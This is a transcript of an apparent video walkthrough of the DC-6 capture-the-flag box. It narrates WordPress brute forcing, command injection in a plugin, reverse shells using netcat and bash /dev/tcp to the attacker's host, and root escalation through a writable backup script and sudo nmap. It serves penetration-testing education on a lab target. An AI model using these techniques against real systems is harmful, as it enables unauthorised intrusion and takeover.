Hey guys, and welcome back to the channel. In this video, we're going to be doing a CTF box called DC6, and this box can be found inside the OneHub database. So this box is pretty much straightforward and easy, so this video is going to be focused more for like the beginners of you guys or intermediate, but if you feel experienced, I hope you learn something new if you stay. So let's just dive in. First things first, we need to find the DC6 box IP address, because when you download and open the VM instance, you can see nothing but a login screen. So what I like doing is when the target is in the same network, it's using BetterCap. BetterCap is mainly designed for scanning, sniffing the network, sorry, and performing man-to-middle attacks, but it has a module which is called NetProp, which scans the network in the IP table and gives the output pretty fast. So I'm gonna go ahead and sudo to BetterCap. If you don't have it installed, you can do it sudo apt install BetterCap inside Kali, and then I'm gonna go and specify net.probe to on. So as you can see, immediately I have all of results. So these are all available devices in my network. So net.show reveals them all in a pretty much nicely formatted table. So from the IP address, I can see that one immediately sticks out as having IP address 141. So we can decide to try and scan this box, but if the IP address is not way different from the others, we can go ahead and put all these IP addresses into a list, perform mass scan or nmap scan towards them all, and see what we can get from each boxes. So we can copy the IP address for now, then exit my BetterCap and do a simple sudo nmap sc sv, which is default script default version. Paste the IP address, I'm going to output that into nmap.txt. This should take time initially, but I'm sure my network is fast. Yeah, so we have two ports open. One of them is being SSH, the other is being HTTP. Inside SSH, we have OpenSSH 7.4 P1. And inside 80, we have Apache HTTPD 2.4.25. So immediately on the nmap scan, we see some redirection tried to occur. So the web application tries to redirect us into a HTTP worthy. So we can assume that there's a virtual host setup. This is a way for organizations to pretty much hide some of their web application servers, assets, and so on by obfuscating them into a vhost file with vhost configuration, sorry. And if we have the ability or successfully enumerated that there's a vhost running, it's always a good idea to add it manually into a vhost file. And what that is going to do is to manually map an IP address to a domain reference so our machine can map it itself. What I'm going to do now is to go ahead and sudo vim /etc/hosts. I'm going to go to the bottom, specify it for OneHub, and there I can paste the IP address and do a tap and then worthy. It's all we have to do. So now our machine knows when we request worthy to access that IP address. So now I'm gonna go ahead into our Kali box and specify HTTP worthy. And yeah, we were being redirected into a what seems like a default WordPress site. So from here we can pretty much do many things. One of them is to scan for additional directories to see if there's something hidden, and let's actually do that. So I'm gonna go ahead and type gobuster dir url wordlist. I'm gonna use seclist, so opt seclist discovery web content raft, let's say small, actually raft small directories.txt. I'm gonna output that into gobuster main.txt. I'm gonna search for extensions php. So we know WordPress is running php. Gonna let it run and see what we can inspect from the application. So here we have a welcome, about us, and contact. So the job here is to actually try to enumerate some kind of usernames, internal information, and so on. But as we can see, there's not much going on. Our lead developer James, this most likely from the team itself. That's what I believe. About us. Welcome. Nothing interesting so far. We can go ahead and type Control U. And this is genuinely a pretty good way of discovering is there any framework or CMS, because many of them gonna leave traces inside the main index.php frontend source file. So here, if I search for WordPress, we have some occurrences, 7. So here we could enumerate the exact version of WordPress. Yeah, so it's always a good idea to use Control U, go into the source files and see if there's any kind of CMS as we have now. So since we enumerated it's WordPress, our GoBuster finished, and now we can instantiate WPScan. WPScan is a tool for scanning WordPress sites. It can scan for vulnerable plugins, users, many more things. So let's go ahead and instantiate WPScan. But before that, let's just see the content we have. So from the GoBuster, we received WP content, which redirects us to WP content. WP, yeah, here with status 301. We have WP admin, WP includes, just the regular WP things, nothing unusual so far. Then we have index.php, traceback, server status, which can be interesting, but we can see it's 403, which is forbidden. And then WP config, which is 0. So let's go ahead and dive into WP scan. So WP scan, go for help to see how it works. As you can see, WP scan requires a URL. Always use the help if you're not sure about the command you want to do. We can verbosely, we have verbose output, output to file. Format, we can go with JSON, nice. And the interesting part is here, where we can enumerate plugins, vulnerable teams, old teams, and users, and so on. So what we're interested in most likely is users and plugins. So let's go ahead and do WP scan, URL, copy that, paste, or maybe it should be URL, and then enumerate users, users or plugin and teams, I believe, VT, vulnerable teams. Let's see how that goes. No, never mind, forgot the teams. We're gonna enumerate users and all plugins. Do I mean UA? Sorry. Invalid option URL, maybe it was you. No. What was the syntax? Dash dash URL. Oh my god. Okay, and let's try again with vulnerable teams. Yeah, now it runs. So let's go ahead to the very, very top and expect the output. So we have the URL, the IP address, headers. XML RPC is enabled. We have some link to modules, which I'm not going to use. Most of the things we run this, they are false positive. So forget about this for now. We have readme file. Let's see what I have. So it's a default readme. We're going to inspect it a little bit later. Then we have the WordPress version. We have team 2017. This version is out of date, which is nice. And we have a bunch of users. So we have admin, Mark, Graham, Sarah, and Jens. Let's go ahead and add them into a custom file. So vim users.txt, admin, Mark, Graham, Sarah, and Jens. And then let's exit that. And then what we can do is try to see if this web application limits the login attempts. And if it's not being limited, we can maybe if we have some work, brute force our way in. So let's go ahead and do a brute force using WPScan. WPScan URL, but without, or instead enumerating the users and plugins and teams and so on, we can do dash u, which means users files, and we can specify the files we added just now. And then for password, I'm going to use the Roku file. User share word list Roku. And let's see how that goes. So this can take some time to run, and I'm gonna go and inspect the readme file to see if there's any interesting things like passwords, usernames, more other configurations and so on. So simple install, yeah. System requirements, online resources, so nothing interesting so far. this is the default WordPress README file, so I'm not sure if we can extract anything from it. So this is gonna take some time. I'm gonna pause the video and come back in when the scan is finished. So after, let's say, 6 minutes of brute forcing, we have successfully enumerated a valid login, which is being marked and helpdesk 01. I'm gonna control C to abort the scanning and brute forcing to not generate any unnecessary traffic. And let's see what happens when we go ahead and log in with the mark helpdesk 01. So I'm gonna go ahead into Wordy. I'm gonna actually go here and type wp admin. Not Google. Oh my god. Wp admin. Oh, come on. Login.php. Yeah. Mark and go ahead and type helpdesk 01. As you can see, we successfully logged in into WordPress instance. So we immediately see that there's a warning of an obsolete WordPress version. And let's see what we can achieve from now. So while having a WordPress, there are several ways of achieving remote code execution ever with shell. So let's see if we can go ahead and add a post. Let's go ahead and add new post. And here let's just type very simple thing like test, publish, submit for review. So that's not the case. We don't want to do this because we cannot just directly go ahead and submit a post. We need first to send it for review, and then the administrator of the site will assume that if this post is appropriate, then he's responsible for reporting it online. So with this way, we are generating unnecessary attention. So let's go ahead and search for anything else. So let's leave that page. Users. These are all the users we have there. Tools. Nothing useful. There's another themes, because if we have the ability to edit a theme, we can also achieve remote code execution, but I don't see a theme right here. So this is configured to be administrative part, and it should be configured that way, by the way. So let's go ahead into activity monitor. Not sure what that is. Some kind of WP plugin. Let's see, workflow activity, filters, worked hooks, must delete. We don't want to delete anything. Settings, tools. I'm afraid clicking here. Actually, yeah. Okay. So we have an IP tools, IP or integer. The convert button will convert the IP address or integer to its equivalent integer or IP address. The lookup button will try to resolve an IP address to hostname if this is installed on the web server. So maybe this sounds like a command injection vulnerability. And command injection pretty much means that let's go ahead here and do a quick demo. So let's say our command is ifconfig, and whenever a request comes to the server, this command is being run. So command injection means that if I can append anything with that command, I can execute here whatever I want. For example, echo hi. So this is gonna get first command executed, but also is gonna get the second command executed. So let's go ahead here and let's try ping. Actually, very important lesson, always test payloads, especially if it's ping on your local box. I cannot remember which one is for Windows, which is for Linux. They have a difference when it comes to timeout. So in Linux, I think it's ping minus C. 172.0.0.1 C1 actually. C1? Yeah, this is just a ping, one packet of ping. And Windows, I believe it was N. I'm not sure. But always when testing a payload, especially ping, always test it locally so you do not hang the application loading forever. So let's go ahead and run a TCP dump and try to ping ourselves to see if that thing works. So I'm gonna go ahead and type ifconfig to see my IP address, open up a new pane and type sudo tcp dump icmp. So now we are listening for incoming pings. So I'm gonna copy my IP address, I'm gonna paste it here, and then I'm gonna do is to we can't write more than that. So there are several ways of us bypassing that. The first way is to go inspect, and then let's go ahead into, let's see, max length, let's make it 150, and now I believe we can continue typing. Yeah, and the size, I think we should increase that up, so just to see our field getting bigger. Yeah, and then ping and paste my IP here. The second way of doing that is to, we're gonna show that as well, capture the request in Burp Suite and then manually input in the payload there. But first of all, let's see if that works. I'm just gonna copy my payload, I'm gonna click to walk up, and nothing really happened. So let's try the convert option. Let's try to convert. No. Yeah. Oh, I mistyped the payload. Was teaching about this and I made the same mistake. So now this way is starting to get annoyed doing debug. So what I suggest to do is to open the Burp Suite, capture the request, and modify the request there. Well, it's good thing it didn't work because the application should hang up if it did. So yeah, I'm gonna put intercept on, I'm gonna go to Foxy Proxy, go to my Burp instance, and then let's go ahead and do a lookup. So now we can send this to repeater with Control R. I'm gonna leave that on, and let's see what happens. So we have form data. So we specify our IP address and then ping. Let's go with C minus one. So let's try to mess up with the payload. I'm gonna leave one ampersand and see what happens. I'm gonna send it. And yeah, now we receive the ping back. So there's multiple ways of achieving code injection. One of them is to put it like that. One way is to put it like that. Then we have double pipes, pipe, or just a semicolon. And there are many multiple ways. If you do your research, you can, I'm sure you can find a lot of ways to achieve in command injection. So now we know that we can execute commands, and now it's time to get a web shell callback. So here we can do many things. From here we can revive the server is having netcat. If it's having netcat, we can do simple netcat web shell. But if it's not, it's just gonna pop up some error logs for the boot teamers. So let's go ahead and search for pentest monkey web shell, and there is a bash shell which works pretty fine. Make sure intercept is being turned off, and pentest monkey reverse shell cheat sheet, and there it is, the bash web shell. What that pretty much does is, if I go ahead here and type nclvmp443, go ahead, paste the command, change the port, and change the IP address. /i. So in case failure happens, it's always a good idea to encapsulate it with /c, and all the payload is gonna get encoded like that. Now it should work. Yep, and it did. I'm gonna exit that. So I'm gonna set up a new listener, copy the payload we have generated. So what it does is to redirect all the bash input output to dev TCP, opens a TCP socket into that IP address to that port. Yeah, so redirects output input and standard error to that specific IP on that specific port. Not sure if I copied the command. Okay, so let's go ahead in Burp repeater, and in the same request, if I remove ping minus C with our payload, in theory this should return a reverse shell to the box. But it did not. Let's try sh. No. Then let's try with the netcat to see if we can get any callbacks. nc, paste the IP address, 443, just without specifying bin bash, just to see if we can receive a callback. And we can. So most likely we can go ahead and create an enkit-driver shell. So nc, we're going to go with minus e and specify bin bash. So in theory, this should call us back and doing the same thing, redirecting bin bash, executing bin bash over the network, and redirects us all the standard in, standard out, and standard error. So here if I type who am I, I'm www.data, so we successfully have a reverse shell on the box. So here, it's always important to keep notes, which I'm gonna do in the future videos to explain how I do this and how it's easier for me. But it's also good to keep your injection request. So if our shell breaks, we can go ahead and return to here and just rerun our shell. So the first thing I like doing is to upgrade our shell using Python PTY. So first, let's see if there's Python in the box. Which Python? There is. Which Python 3? There is as well. So Python 3-C, import PTY, PTY will spawn, bin bash. So now our shell, as you can see, is quite more beautiful and it looks far more interesting. So let's see where we are. Into WordPress, let's go back and HTML and inspect the wp-config file. So WordPress uses a wp-config file where it stores the database credentials, so it's always a good place to start. Let's see, cat wp-config.php. So let's see, we have some keys defined there. Let's go a little bit at the top. So we have a host name, we have a DB, we have a DB password, we have, that's it. So let's go ahead and type vim wp-config.txt and let's see, WordPress DB, password is being meerkats, I'm not typing, pass equals meerkats, okay, and then the user is equals to wpdb user. That's fine, always keep walks of that thing. So now let's go ahead and see what directories we can what we can read and so on. So let's go inside home and we have four users there. Let's go ahead into cd graham, not in there. We have a bashfc profile, so let's go ahead and read it. Got bashfc. Not sure there's anything interesting. Yeah, let's go back. CD Jens, SLA. We have something. So we have a backup.sh. And we should be able to read it. Backups. Backups.sh. So it's strange, but it's using tar, it's backupping something into var. It's backupping var.html into a backup file, which is nice to have. Okay, let's go ahead into mark. That's a directory stuff. Cat things to do.txt. And we have a note there. Let's see, restore full functionality for hyperdrive, buy present for Sarah's farewell party, add new user, Graham, and a potential password. So, it's always a good idea just to go ahead and scan all your directories to see if there's a password leak as we have now seen. So, let's go ahead and do a new file, vim graham. User, Graham, yeah, and GS077ISUM1D4. And what we can do now is to sh into the box since we saw that the port 22 has been opened. So let's go sh. What was the IP address? Oh crap. Cat nmap. Copy the IP address. Sh. Graham to the box. Add the fingerprint and then type the password GS07ISUM1D4. And we're in. This is the action where you see in the action movies when the hacker says we're in. That's what I mean. Yeah. So we have now escalated our privileges into Graham. We have Graham, Graham, groups, Graham, and devs. So here on the other shell, if I go with ID, we can see we're not devs. We are role privileged www data user. And now we are inside a devs group. And the other thing is that we can pretty much do upgrades from Graham into our main shell where we got command injection here. But this shell is more unstable than the SSH, and it's always a good idea to use SSH when we have valid credentials. So for now, I'm going to leave that shell open just for any cases. I'm going to continue working from here. So now let's go back. Let's see where we are. Let's go back into Jens, because there are some backup file that we can execute actually. So let's go back to see Sarah, because we missed her. Another bash FC. Again, nothing fancy. So let's leave Sarah. Let's go into Jens. Okay, let's first try to see if we can run any command as root. So sudo dash l. And it seems like that we can run home Jens backup.sh as user Jens. So pretty much we would be able to escalate our privileges into Jens by using that command, the backup file. So if we have the ability to write into that backup file, we will have the ability to overtake the Jens account. So let's see. LSLA, backup.sh, and looks like groups dev, we can write into that file. So let's go ahead and type actually cat backup. Since we're using SSH shell, we have the luxury of using Vim or Nano. But if we are using other shells like the one we got from the previous attack, the netcat shell, using Vim should completely break the shell. So unless any additional configs were made. So it's always a good idea if the payload is simple, just to use echo type payload here and then move it to the file. But if we have a SSH shell as we have now, we have the luxury, as I said, to use Vim. So let's go ahead and type vim backups.sh or vi. And then here, let's do quite the same thing, bash-c. Let's go ahead and copy again our bash payload, paste it here. Change the, oh my God. Okay, change the port. Yeah, it break. So it's always a good idea, no matter the, we have a, since we have a SSH shell, I thought it's been a good idea to use Vim, but as you saw, the Vim completely broke, so let's stick to the plan B. So I'm gonna do is echo bash-c, bash, here I'm gonna put my bash reverse shell. Yeah, so we are successfully echoing our payload, gonna change the port, and then I'm gonna change my IP address, which is gonna be, of course I forgot it, too bad with names and IPs and so on. Here, paste my IP. So this should print the payload we want, and we're gonna redirect our echo command into the backup.backups.sh file. And keep in mind that we're using double signs for bigger, because we want to append to the file, not overwrite it. If you use one arrow, it's going to override the file. If you use two arrows, it's going to append your content to the file. So when I run that command, I can cut backups.sh. And as you can see, that file is being modified and it has a payload inside. So what I have to do is I can kill that shell. I'm going to go with again with a listener. And now I can go sudo dash u, actually sudo dash l, and then sudo dash u gens and specify the command I can execute. Yeah, as you can see, we have a connection from gens, and now we successfully escalated our privileges to gens. Now, it's always a good idea to have tools like limpies in order to see enough information about the system. Since we have a shell, it's always a good idea to start reconning the operational system again, because every user has a different level of privileges, of access control, and so on. And another user may be able to privilege the root, but another may not be. So since we have gens, let's run tool called limpies and see what information can we get from there. Let's first download it, limpies, GitHub. I'm not sure that's the right repo. I think that is. Never mind. Just gonna download the psuite. Open your terminal window, cd opt, sudo git clone, paste that in. Come on. Okay, and now what I can do is here open a new shell, cp opt, let's see, peace, limpies, yeah, limpies, builder, guess that's not it. No, it's not it. Oh my god. Limpies. Let's see. Yeah, that's the thing we want. So just now for testing purposes, let's download that. And I will put the link to the GitHub repo to all the Wimpies, Limpies, and I forgot the name about the Mac one. So let's just use that for now. I'm gonna go ahead and here paste that command curl-shell. Actually, I can go and wget that thing. Wget. Okay, so we have a valid Wimpies. Let's try to move that into our gens box, execute it, and see what happens. So for that case, I'm gonna go ahead and run a Python web server. So Python 3 m HTTP server 80. I'm gonna copy my IP address. I'm gonna go to gens cd var temp or any other directories. Cd temp. Okay. And then we get HTTP my IP and then limpies. What was the name? Yeah, limpies.sh. So as you can see, we received the request. And now if I go ls, I have file called limpies.sh. I'm gonna chmod plus x, so I'm assigning privileges for execution in that file limpies.sh, and I can simply do limpies.sh. So this tool is really nice and it's scanning the whole operational system, including kernel level, environmental variables, process networking, CID binaries, and many more things. So while it's running, I'm gonna go to the very top and start inspecting the output. So we have a legend where it says when we see red slash yellow, we most likely want to escalate privileges from there, and it's most likely an escalation vector. We have an old Linux version. Yeah, old Linux version, sudo version. Let's see. We have exploit suggestion. Wow, the last time I run that, it didn't have that thing, which is nice. We have some kernel exploit suggestions. And what I genuinely recommend is to go with kernel exploits when you have nothing else to do, because kernel, especially when you are in real engagement, because kernel exploits sometimes, most of the times, are kind of dangerous. They can easily break the system. So there's a chance of you getting your server crashed, which is going to pretty much end your engagement. So now let's go here to inspect clean process. Let's see. Cron tab. These are the cron jobs our machine has. Writable socket files. Generally, we're looking for something yellow. We have MySQL running on local port, which we know that is for WordPress. And by running sudo -l, the limpies receive the output that we can escalate our privileges to root by using nmap. So nmap is a vault on that box. So following that logic, if I go ahead and type sudo -l, I can see that I can run nmap as root. And this can be a really bad privilege escalation vector. I can go to GTFO bins. Yeah. And GTFO bins is pretty much a library which contains a lot of privilege escalation vectors. So here I need to type the binary nmap. Go here and search for sudo. File write cid sudo. So we have two ways of escalating our privileges. One is setting a variable, echoing that, and running it as a script. The second one is to go ahead and sudo nmap with -- interactive and spawn a shell from there. So the second option seems way more familiar and easy to use, so let's go ahead and do that. So sudo user bin nmap --- interactive. And we can do that, or I mistype it. Sudo user bin nmap. Yeah. Nmap unrecognized option. So what I suggest is that interactive is vulnerable to old version of nmap, and the newest version of nmap doesn't have that flag. I'm not sure if that's the case, but it didn't work. So let's stick to the first one. I'm going to go ahead and copy the syntax from there. And what we do is define a new variable. We are filling that variable with osexecute bin shell. And then we are using sudo nmap and we are specifying the script. So we are creating a script and we are running nmap toward that script, which the script itself spawns as a shell. So if I run that, nmap started, it loads the script, and if I go ahead and type id, you can see that I've successfully become root. And pretty much that's the box. Thank you guys for watching. If you enjoy the content or want to see content like that in the future, make sure to subscribe to the channel and like this video. I hope you learned something new and see you in the next one.